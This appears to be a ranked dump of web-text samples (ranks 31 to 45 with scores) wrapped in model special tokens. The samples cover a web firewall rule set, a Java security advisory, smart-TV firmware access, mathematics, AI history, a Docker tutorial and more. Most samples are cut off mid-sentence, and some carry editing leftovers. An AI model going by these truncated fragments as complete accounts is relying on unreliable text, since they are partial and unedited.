f_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 5406720.0 +<|begin_of_text|>OWASP ModSecurity Core Rule Set (CRS) + +The 1st Line of Defense Against Web Application Attacks + +The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. The CRS provides protection against many common attack categories, including SQL Injection, Cross Site Scripting, Locale File Inclusion, etc. The offical website of the project can be found at https://coreruleset.org. + +Getting Started / Tutorials + +The following tutorials will get you started with ModSecurity and the CRS v3. + +These tutorials are part of a big series of Apache / ModSecurity guides published by netnea. They are written by Christian Folini. + +More Information about the rule set is available at the official website, https://coreruleset.org. + +Licensing + +OWASP ModSecurity CRS is free to use. It is licensed under the Apache Software License version 2 (ASLv2), so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. + +Reporting Issues + +If you think you've found a false positive in commercially available software and want us to take a look, submit an issue on our Github + +Have you found a false negative/bypass? We'd love to hear about it - please responsibly disclose it to security@coreruleset.org<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 5275648.0 +<|begin_of_text|>In the age of ‘Big Data,’ with datasets rapidly growing in size and complexity and cloud computing becoming more pervasive, data science techniques are fast becoming core components of large-scale data processing pipelines. + +Apache Spark offers analysts and engineers a powerful tool for building these pipelines, and learning to build such pipelines will soon be a lot easier. Databricks is excited to be working with professors from University of California Berkeley and University of California Los Angeles to produce two new upcoming Massive Open Online Courses (MOOCs). Both courses will be freely available on the edX MOOC platform in spring summer 2015. edX Verified Certificates are also available for a fee. + +The first course, called Introduction to Big Data with Apache Spark, will teach students about Apache Spark and performing data analysis. Students will learn how to apply data science techniques using parallel programming in Spark to explore big (and small) data. The course will include hands-on programming exercises including Log Mining, Textual Entity Recognition, Collaborative Filtering that teach students how to manipulate data sets using parallel processing with PySpark (part of Apache Spark). The course is also designed to help prepare students for taking the Spark Certified Developer exam. The course is being taught by Anthony Joseph, a professor at UC Berkeley and technical advisor at Databricks, and will start on February 23rd June 1st, 2015. + +The second course, called Scalable Machine Learning, introduces the underlying statistical and algorithmic principles required to develop scalable machine learning pipelines, and provides hands-on experience using PySpark. It presents an integrated view of data processing by highlighting the various components of these pipelines, including exploratory data analysis, feature extraction, supervised learning, and model evaluation. Students will use Spark to implement scalable algorithms for fundamental statistical models while tackling real-world problems from various domains. The course is being taught by Ameet Talwalkar, an assistant professor at UCLA and technical advisor at Databricks, and will start on April 14th June 29th, 2015. + +Both courses are available for free on the edX website. You can sign up for them today:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 33; Score = 5275648.0 +<|begin_of_text|>* Dept of Homeland Security: Java vulnerable to hackers + +* Could be used to steal identity, form malicious networks + +* Applies to browsers on all major operating systems + +By Jim Finkle + +Jan 11 (Reuters) - The U.S. Department of Homeland Security urged computer users to disable Oracle Corp’s Java software, amplifying security experts’ prior warnings to the hundreds of millions of consumers and businesses that use it to surf the Web. + +Hackers have figured out a way to exploit Java to install malicious software enabling them to commit crimes ranging from identity theft to making an infected computer part of an ad-hoc network of computers that can be used to attack websites. + +“We are currently unaware of a practical solution to this problem,” the Department of Homeland Security’s Computer Emergency Readiness Team said in a posting on its website late on Thursday. + +“This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered,” the agency said. “To defend against this and future Java vulnerabilities, disable Java in Web browsers.” + +Java is a computer language that enables programmers to write software utilizing just one set of code that will run on virtually any type of computer, including ones that use Microsoft Corp’s Windows, Apple Inc’s OS X and Linux, an operating system widely employed by corporations. + +Computer users access Java programs through modules, or plug-ins, that run Java software on top of browsers such as Internet Explorer and Firefox. + +The U.S. government’s warning on Java came after security experts earlier on Thursday warned of the newly discovered flaw. + +It is relatively rare for government agencies to advise computer users to completely disable software due to a security bug, particularly in the case of widely used programs such as Java. They typically recommend taking steps to mitigate the risk of attack while manufacturers prepare an update, or hold off on publicizing the problem until an update is prepared. + +In September, the German government advised the public to temporarily stop using Microsoft’s Internet Explorer browser to give it time to patch a security vulnerability that opened it to attacks. + +The Department of Homeland Security said that attackers could trick targets into visiting malicious websites that would infect their PCs with software capable of exploiting the bug in Java. + +It said that an attacker could also infect a legitimate website by uploading malicious software that would infect machines of computer users who trust that site because they have previously visited it without experiencing any problems. + +They said developers of several popular tools known as exploit kits, which criminal hackers use to attack PCs, have added software that allows hackers to exploit the newly discovered bug in Java to attack +================================================================================ +Rank = 34; Score = 5242880.0 +<|begin_of_text|>Originally called “connected TVs,” and now they are called as “smart TVs”. Any television that can be connected to the Internet to access services, use apps and behave in some way as our computers with web browser. Smart TVs connect to Internet via wired Ethernet connection or Wi-Fi to connect to a home network. Smart TVs require computer chips to juggle video processing, multiple screens and an Internet connection. They also use memory to buffer streaming video and music, and need additional processing power to deal with graphics. The TVs can be controlled by voice commands and by apps running on some Smartphone. + +Dan Reynolds, information security solution and training expert of International Institute of cyber security explains that these Smart TVs are not that smart and the security of software isn’t exactly perfect. Smart TVs resemble for us the Internet of things (IoT) but old vulnerabilities which were considered to have completely disappeared are new vulnerabilities again in the Internet of Things (IoT). Sometimes you can easily find a flaw that can enable you to take a variety of actions on the TV, including accessing potentially sensitive data, remote files and information, the drive image and eventually gain root access to the device. + +In the article we will be covering different aspects of two most famous brands of Smart TVs Samsung and LG with the help of ethical hacking course professor of IIcybersecurity. + +Understanding SAMSUNG SMART TV Operating system + +Tizen is an operating system based on the Linux kernel and the GNU C Library implementing the Linux API. It targets a very wide range of devices including smart phones, tablets, in-vehicle infotainment (IVI) devices, smart TVs, PCs, smart cameras, wearable computing, Blu-ray players, printers and smart home appliances. Its purpose is to offer a consistent user experience across devices. Tizen would be implemented in Samsung TVs from 2015. + +There are some online community which are working over the Samsung smart TV OS research like ( Sammygo) mentions Dan Reynolds, information security solution and training expert. + +How to do analysis over Samsung Smart TV firmware + +ExLink connector consist of a cable which has in one side a 3.5mm jack, like the audio ones, and on the other side an RS232 ( Serial ) DB9 connector. This cable will allow you to connect your PC computer to the TV, and enter in the Serial mode. With this you can use a serial Communications Software, like Hyperterminal, Putty from Windows or Linux. + +Connecting to Samsung TV + +Put the TV into Standby Mode, press [Info] then [Menu] +================================================================================ +Rank = 35; Score = 5177344.0 +<|begin_of_text|>Despite the events depicted in The Imitation Game, Alan Turing did not invent the machine that cracked Germany’s codes during World War II—Poland did. But the brilliant mathematician did invent something never mentioned in the film: a mathematical tool for judging the reliability of information. His tool sped up the work of deciphering encoded messages using improved versions of the Polish machines. + +Now researchers studying rhesus monkeys have found that the brain also uses this mathematical tool, not for decoding messages, but for piecing together unreliable evidence to make simple decisions. For Columbia University neuroscientist Michael Shadlen and his team, the finding supports a larger idea that all the decisions we make—even seemingly irrational ones—can be broken down into rational stastical operations. “We think the brain is fundamentally rational,” says Shadlen. + +Invented in 1918, the German Enigma machine created a substitution cipher by swapping the original letters in a message for new ones, producing what seemed like pure gibberish. To make the cipher more complicated, the device had rotating disks inside that swiveled each time a key was pressed, changing the encoding with each keystroke. The process was so complex that even with an Enigma machine in hand, the Germans could decipher a message only by knowing the initial settings of those encryption dials. + +Turing created an algorithm that cut down the number of possible settings the British decryption machines, called bombes, had to test each day. Working at the secret Bletchley Park facility in the U.K., Turning realized that it was possible to figure out if two messages had come from machines with rotors that started in the same positions—a key piece of information for figuring out those positions. Line up two encoded messages, one on top of the other, and the chance that any two letters will be the same is slightly greater if both messages came from machines with the same initial settings. This is because in German, as in English, certain letters tend to be more common, and the encryption process preserved this pattern. + +Turing’s algorithm essentially added up the probabilities of those clues being useful. It also indicated when the cumulative odds were good enough to either accept or reject that the two messages being compared came from machines with the same rotor states. This statistical tool, called the sequential probability ratio test, proved to be the optimal solution to the problem. It saved time by allowing the Bletchley codebreakers to decide whether two messages were useful while looking at the fewest number of letters possible. Turning wasn +================================================================================ +Rank = 36; Score = 5144576.0 +<|begin_of_text|>Let be a natural number. A basic operation in the topology of oriented, connected, compact, -dimensional manifolds (hereby referred to simply as manifolds for short) is that of connected sum: given two manifolds, the connected sum is formed by removing a small ball from each manifold and then gluing the boundary together (in the orientation-preserving manner). This gives another oriented, connected, compact manifold, and the exact nature of the balls removed and their gluing is not relevant for topological purposes (any two such procedures give homeomorphic manifolds). It is easy to see that this operation is associative and commutative up to homeomorphism, thus and, where we use to denote the assertion that is homeomorphic to. + +(It is important that the orientation is preserved; if, for instance,, and is a chiral 3-manifold which is chiral (thus, where is the orientation reversal of ), then the connect sum of with itself is also chiral (by the prime decomposition; in fact one does not even need the irreducibility hypothesis for this claim), but is not. A typical example of an irreducible chiral manifold is the complement of a trefoil knot. Thanks to Danny Calegari for this example.) + +The -dimensional sphere is an identity (up to homeomorphism) of connect sum: for any. A basic result in the subject is that the sphere is itself irreducible: + +Theorem 1 (Irreducibility of the sphere) If, then. + +For (curves), this theorem is trivial because the only connected -manifolds are homeomorphic to circles. For (surfaces), the theorem is also easy by considering the genus of. For the result follows from the prime decomposition. But for higher, these ad hoc methods no longer work. Nevertheless, there is an elegant proof of Theorem 1, due to Mazur, and known as Mazur’s swindle. The reason for this name should become clear when one sees the proof, which I reproduce below. + +Suppose. Now consider the infinite connected sum + +This is an infinite connected sum of spheres, and can thus be viewed as a half-open cylinder, which is topologically equivalent to a sphere with a small ball removed; alternatively, one can contract the boundary at infinity to a point to recover the sphere. On the other hand, by using the associativity of connected sum (which will still work for the infinite connected sum, if one thinks about it carefully +================================================================================ +Rank = 37; Score = 5111808.0 +<|begin_of_text|>Just a few years ago the common perception was that we were in an AI winter. + +Although there were lots of narrow AI applications running in the background of our daily lives, there wasn’t much enthusiasm. + +But quietly in the background, a revolution was building thanks to progress across a few key areas. These areas would soon converge to produce breakthrough after breakthrough and put us on the verge of what many believe to be the most important event in human history. + +Key Advance 1) More Data + +Andrew Ng of Baidu explains that a massive amount of data is needed. If you put 10x the data in many of these algorithms they work, put 1/10th in and they don’t. + +Previously it was very difficult to get hold of the massive amounts of data required to feed the AI systems, but thanks to the internet researchers have tonnes of data to train their neural nets. + +Key Advance 2) More Computing Power + +If you only have the computational power to build a small neural network it doesn’t work. But computer power has continued to increase and prices have dropped. + +Moore’s Law may be stalling, but the Law of Accelerating Returns is not. + +The Law of Accelerating Returns. What Steve Jurvetson calls “the most important graph ever”. + +GPUs are much better for training neural networks than CPUs and have provided the computer power needed for these algorithms to function. + +Infrastructure has also improved. Today it’s possible for anyone to rent a massive amount of GPU power on cloud computing platforms (AWS, Microsoft Azure, Google Cloud, IBM Cloud). + +Key Advance 3) Better Algorithms + +Neural networks have been known about for decades, but most researchers had given up on them + +Geoffrey Hinton of Google is one of the few who stuck with it. Despite his peers calling it a dead end, he believed that it was the right approach. It turned out he was right. + +Hinton learned how to stack neural networks dozens of layers deep (deep learning) which enabled vastly more calculations and now he is considered “the godfather of neural networks”. + +With these 3 breakthroughs in place neural networks finally began to work. And they worked better than almost anyone expected. + +The Tipping Point: ImageNet 2012 + +The ImageNet project was created in 2009 to judge how well computers can see. + +In 2011 computers had a 26% error rate when trying to label images. Humans only had a 5% error rate. + +But in 2012, Hinton’s team made a breakthrough +================================================================================ +Rank = 38; Score = 5046272.0 +<|begin_of_text|>We live in a world of pain and suffering. There is no one who is not affected by the harsh realities of life, and the question “why do bad things happen to good people?” is one of the most difficult questions in all of theology. God is sovereign, so all that happens must have at least been allowed by Him, if not directly caused by Him. At the outset, we must acknowledge that human beings, who are not eternal, infinite, or omniscient, cannot expect to fully understand God’s purposes and ways.The book of Job deals with the issue of why God allows bad things to happen to good people. Job was a righteous man (Job 1:1), yet he suffered in ways that are almost beyond belief. God allowed Satan to do everything he wanted to Job except kill him, and Satan did his worst. What was Job’s reaction? “Though he slay me, yet will I hope in him” (Job 13:15). “The LORD gave and the LORD has taken away; may the name of the LORD be praised” (Job 1:21). Job did not understand why God had allowed the things He did, but he knew God was good and therefore continued to trust in Him. Ultimately, that should be our reaction as well.Why do bad things happen to good people? As hard as it is to acknowledge, we must remember that there are no “good” people, in the absolute sense of the word. All of us are tainted by and infected with sin (Ecclesiastes 7:20; Romans 3:23; 1 John 1:8). As Jesus said, “No one is good—except God alone” (Luke 18:19). All of us feel the effects of sin in one way or another. Sometimes it’s our own personal sin; other times, it’s the sins of others. We live in a fallen world, and we experience the effects of the fall. One of those effects is injustice and seemingly senseless suffering.When wondering why God would allow bad things to happen to good people, it’s also good to consider these four things about the bad things that happen:1) Bad things may happen to good people in this world, but this world is not the end. Christians have an eternal perspective: “We do not lose heart. Though outwardly we are wasting away, yet inwardly we are being renewed day by day. For our light and momentary troubles are achieving for us an eternal glory that far +================================================================================ +Rank = 39; Score = 4685824.0 +<|begin_of_text|>Eigenfaces is the name given to a set of eigenvectors when they are used in the computer vision problem of human face recognition.[1] The approach of using eigenfaces for recognition was developed by Sirovich and Kirby (1987) and used by Matthew Turk and Alex Pentland in face classification.[2] The eigenvectors are derived from the covariance matrix of the probability distribution over the high-dimensional vector space of face images. The eigenfaces themselves form a basis set of all images used to construct the covariance matrix. This produces dimension reduction by allowing the smaller set of basis images to represent the original training images. Classification can be achieved by comparing how faces are represented by the basis set. + +History [ edit ] + +The eigenface approach began with a search for a low-dimensional representation of face images. Sirovich and Kirby (1987) showed that principal component analysis could be used on a collection of face images to form a set of basis features. These basis images, known as eigenpictures, could be linearly combined to reconstruct images in the original training set. If the training set consists of M images, principal component analysis could form a basis set of N images, where N < M. The reconstruction error is reduced by increasing the number of eigenpictures, however the number needed is always chosen less than M. For example, if you need to generate a number of N eigenfaces for a training set of M face images, you can say that each face image can be made up of "proportions" of all this K "features" or eigenfaces : Face image 1 = (23% of E 1 ) + (2% of E 2 ) + (51% of E 3 ) +... + (1% E n ). + +In 1991 M. Turk and A. Pentland expanded these results and presented the eigenface method of face recognition.[3] In addition to designing a system for automated face recognition using eigenfaces, they showed a way of calculating the eigenvectors of a covariance matrix in such a way as to make it possible for computers at that time to perform eigen-decomposition on a large number of face images. Face images usually occupy a high-dimensional space and conventional principal component analysis was intractable on such data sets. Turk and Pentland's paper demonstrated ways to extract the eigenvectors based on matrices sized by the number of images rather than the number of pixels. + +Once established, the eigenface method was expanded to include methods of preprocessing to improve accuracy.[4 +================================================================================ +Rank = 40; Score = 4685824.0 +<|begin_of_text|>Quality of life (QOL) is an overarching term for the quality of the various domains in life. It is a standard level that consists of the expectations of an individual or society for a good life. These expectations are guided by the values, goals and socio-cultural context in which an individual lives. It is a subjective, multidimensional concept that defines a standard level for emotional, physical, material and social well-being. It serves as a reference against which an individual or society can measure the different domains of one’s own life. The extent to which one's own life coincides with this desired standard level, put differently, the degree to which these domains give satisfaction and as such contribute to one's subjective well-being, is called life satisfaction. + +Overview [ edit ] + +Quality of life is the general well-being of individuals and societies, outlining negative and positive features of life. It observes life satisfaction, including everything from physical health, family, education, employment, wealth, safety, security to freedom, religious beliefs, and the environment.[1] QOL has a wide range of contexts, including the fields of international development, healthcare, politics and employment. It is important not to mix up the concept of QOL with a more recent growing area of health related QOL (HRQOL[2]). An assessment of HRQOL is effectively an evaluation of QOL and its relationship with health. + +Quality of life should not be confused with the concept of standard of living, which is based primarily on income. + +Standard indicators of the quality of life include not only wealth and employment but also the built environment, physical and mental health, education, recreation and leisure time, and social belonging.[3][4] According to the World Health Organization (WHO), quality of life is defined as “the individual’s perception of their position in life in the context of the culture and value systems in which they live and in relation to their goals.” In comparison to WHO's definitions, the Wong-Baker Faces Pain Rating Scale defines quality of life as “life quality (in this case, physical pain) at a precise moment in time.”[5] + +According to ecological economist Robert Costanza: + +While Quality of Life (QOL) has long been an explicit or implicit policy goal, adequate definition and measurement have been elusive. Diverse "objective" and "subjective" indicators across a range of disciplines and scales, and recent work on subjective well-being (SWB) surveys and the psychology of happiness have spurred renewed interest.[6] + +One approach, called engaged theory, outlined +================================================================================ +Rank = 41; Score = 4685824.0 +<|begin_of_text|>BY: Follow @LizWFB + +Researchers at the National Institutes of Health (NIH) have developed a system that can predict the "psychological status" of users with smartphones and hope to private companies to bring the invention to the market. + +The technology appeared on a list of NIH inventions published in the Federal Register that are now available to be licensed by private companies. The government allows companies to license inventions resulting from federal research in order to expedite their arrival on the marketplace. + +The system uses smartphones to ask people how they are doing mentally during the day and based on the results can "deliver an automated intervention" if necessary. + +"The NIH inventors have developed a mobile health technology to monitor and predict a user's psychological status and to deliver an automated intervention when needed," according to the notice published Wednesday. "The technology uses smartphones to monitor the user's location and ask questions about psychological status throughout the day." + +"Continuously collected ambulatory psychological data are fused with data on location and responses to questions," the NIH said. "The mobile data are combined with geospatial risk maps to quantify exposure to risk and predict a future psychological state. The future predictions are used to warn the user when he or she is at especially high risk of experiencing a negative event that might lead to an unwanted outcome (e.g., lapse to drug use in a recovering addict)." + +The NIH said the technology has potential commercial applications for "real-time behavior monitoring" and "therapeutic delivery of an intervention via a mobile device." + +Researchers developed the system from a project that tracked the mood and cravings of drug users in Baltimore. The $8.9 million federal study sought to develop algorithms that could "automatically detect behavioral events (such as episodes of drug use or stress) without requiring self-report." + +The NIH said the app is currently being used for drug addiction interventions, but that the "inventors are also seeking to test the technology for other health applications." + +Request for comment from the NIH was not returned by press time.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 42; Score = 4620288.0 +<|begin_of_text|>Fraser Smith is a psychology research assistant and seminar tutor who is also working toward his doctorate in counseling psychology. Fraser took time out of his busy schedule to speak with us about his love for psychology, his ongoing projects and his desire to encourage collaboration in the psychology field. + +Smith credits his mother for inspiring his career in psychology, as she was the first person in his family to receive a degree in the field. Fraser knew he wanted to emulate his mother and go on to college after high school. He also noted, “I have always been fascinated by people and the way they behave, both individually and in group settings. I think this played a part in my passion for psychology as well.” + +Even with this inspiration, Fraser took a unique path to end up in his current role. His first exposure to counseling came when he began an evening job working behind the reception desk of a relationship counseling center. The company then offered to send him on a free therapy training course, which sparked a love for the direct practice aspects of psychology. This led him to pursue a psychology degree while working as a research assistant and after graduation to continue on toward a doctorate degree. + +Currently, Smith is working as a qualitative researcher in a lab investigating antimicrobial resistance. Participants are interviewed about their perceptions of antibiotics and their behaviors about taking them. The hope is to increase the knowledge surrounding how people think about antibiotics to better educate them about taking them. The research is still in its early stages, but Smith is excited to see results and gain a deeper understanding of human behavior. + +When working in the lab, Fraser spends a lot of time analyzing interview transcripts and conducting thematic analyses of these transcripts. He also works with a team to conduct interviews and to bring their findings together to create publishable results. Smith uses printed transcripts and a highlighter when analyzing, as he finds this helps him with his analysis. He then uploads his results into an online program to ensure his data is secure. One of the program’s current flaws is that it is difficult to communicate his results with fellow researchers. Fraser likes the features of Conseris because it safely stores data while also making it easy to identify patterns and share those trends with fellow researchers. Smith emphasized the importance of collaboration in this area of research. + +When not in the lab, Fraser is working on the early stages of his doctorate in counseling psychology. He will soon begin practical training and will recieve his placement for direct practice later this year. Smith hopes to learn more about the power of therapy so he can enact his passion for helping people +================================================================================ +Rank = 43; Score = 4554752.0 +<|begin_of_text|>OctaEdit has been built in a modular fashion, where each module can be used for various tasks, and each module can interact with the other modules in various ways. + +OctaEdit has eleven (11) Modules: Project, Samples, Sequencer, Manager, Chainer, Arp Designer, LFO Designer, Library, Analytics, Options and Support. + +OctaEdit LE is restricted to five (5) Modules: Manager, Chainer, Analytics, Options and Support. + +The Manual is available to download for further details. + +OctaEdit YouTube Channel + +Please visit our Forum for detailed information and FAQ’s. + +The Project Module + +The Project module provides access to all the settings of the currently loaded Project, includes integration with the Library module and copy/paste functionality. + +The Samples Module. + +The Samples module allows the ability to manage all sample slots within a project. Features include Sample Slicing/Editing, drag/drop from file browser or audio browser, sample remapping, sample playback, sample editing, renaming and analysis amongst others. + +The Sequencer Module. + +The Sequencer module provides full access to every element of the Octatrack, from entire configurations down to a parameter locks on a single step. + +The Sequencer module is fully integrated with the Arp and LFO Designer modules allowing quick and easy modifications on each track. + +The Sequencer module is also fully integrated with the Library module allowing the ability to Save/Load any element of your setup, from your Parts, Audio/Midi/Recoder Machine configurations, Scenes through to FX Chains, Amp configurations and much, much more… + +The Manager module. + +The Manager module provides the ability to copy “Elements” from a Source Set/Project to a Target Set/Project. + +Elements can be copied at the Project, Bank, Pattern, Track, Part or Scene level, from any Project in any Set to any other Project in any other Set, and includes the ability to remap sample assignments on the fly. + +Boasting a feature set that is way too long to list, with just a couple of clicks entire sets can be merged together seamlessly, meaning you never have to worry about the Octatrack structure ever again. + +The Chainer Module. + +The Chainer module allows the ability to create Sample Chains on the fly from various audio files. Features include drag/drop from file browser and integration with OctaEdit’s other modules like the ‘Samples’ module, randomisation and so on. + +The Arp Designer Module. + +The Arp Designer module provides the ability to graphically design arpeggios +================================================================================ +Rank = 44; Score = 4554752.0 +<|begin_of_text|>InfluxDB : InfluxDB is an open-source time series database written in Go that has been built to work best with metrics, events, and analytics. Using InfluxDB, you can easily store system and application performance data and manage any time series data. + +Grafana : Grafana is an open-source, general purpose dashboard that is used for visualizing time series data for Internet infrastructure and application analytics. Grafana supports graphite, influxdb or opentsdb as backends and runs as a web application. + +In this tutorial, we will learn how to create and run Grafana and InfluxDB Docker containers in Ubuntu 14.04. + +Requirements + +A server running Ubuntu-14.04 with Docker installed. + +A non-root user with sudo privileges setup on server. + +Creating The Dockerfile + +First, you will need to create the Docker file to install all requisite software. Create docker file inside your home directory using the following command: + +sudo nano Dockerfile + +Add the following lines with all requisite software: + +FROM ubuntu MAINTAINER Hitesh Jethva (hitjethva@gmail.com) RUN apt-get update && apt-get -y --no-install-recommends install ca-certificates software-properties-common python-django-tagging python-simplejson python-memcache python-ldap python-cairo python-pysqlite2 python-support python-pip gunicorn supervisor nginx-light nodejs git curl openjdk-7-jre build-essential python-dev + +Add the following lines to install Grafana, InfluxDB, and do some basic configuration: + +WORKDIR /opt RUN curl -s -o /opt/grafana-1.8.1.tar.gz http://grafanarel.s3.amazonaws.com/grafana-1.8.1.tar.gz && curl -s -o /opt/influxdb_latest_amd64.deb http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb && mkdir /opt/grafana && tar -xzvf grafana-1.8.1.tar.gz --directory /opt/grafana --strip-components=1 && dpkg -i influxdb_latest_amd64.deb && echo "influxdb soft nofile unlimited" >> /etc/security/limits.conf && echo "influxdb hard nofile unlimited" >> /etc/security/limits.conf + +Next, copy some configuration files: + +ADD config.js /opt/grafana/config.js ADD nginx.conf /etc/nginx/nginx.conf ADD supervisord.conf /etc/supervisor/conf.d/superv +================================================================================ +Rank = 45; Score = 4358144.0 +<|begin_of_text|>JREF Swift Blog + +The Lurking Pornographer: Why Your Brain Turns Bubbles Into Nude Bodies + +There is a pornographer lurking in some corner of your mind. He peeks out from behind the curtains of your consciousness without warning, and almost never at an acceptable time. + +The lurking pornographer in your brain is ever vigilant, looking for patterns, for signs of nudity, and sometimes generating them out of nowhere. He is exceedingly good at what he does, and isn’t afraid to prove his power over your perception. Just like that, he can take a picture of Daniel Craig in a bathing suit and turn it obscene. + +If anything, Craig is more covered than he was before, but still he must be nude in the new picture, or so the pornographer would have you believe. The pornographer is sly. He takes advantage in the slightest slip in shapes and curves to insert his nudity. One of his favorite techniques is called “bubbling,” a technique that reveals how our brains actually “see.”. + +Breasts and Blind Spots + +Stifled by the pornography-restricting tenets of his religion, a young Mormon took to Photoshop, or so the story goes. His attempt to fool God and circumvent his law resulted in “bubbling,” a trick clever enough that how it works hasn’t yet been answered. + +You eye doesn’t see everything. Right now, there are innumerable photons hitting the photoreceptors all over your retina, except in the place where your optic nerve connects to it. This area is your blind spot, and it should show up as a rather large black dot in your vision, but it doesn’t. Why not? + +As your brain matures, it learns from the world. Neuronal connections are formed and broken in accordance with the deluge of information your brain receives. Over time, your brain becomes adept at predicting the world, so much so that much of our conscious lives are spent only noticing when things aren’t going as predicted. For example, there was probably a time when you got out of the car and realized you have almost no recollection of the drive you just took. It seemed automatic because it was. Consciousness didn’t need to intrude during something so routine, so it didn’t. However, introduce a near-collision into your daily commute, and consciousness quickly steps up to handle the situation. + +Based on all the shapes and colors and lines and lighting schemes that your brain has encountered, your cognition 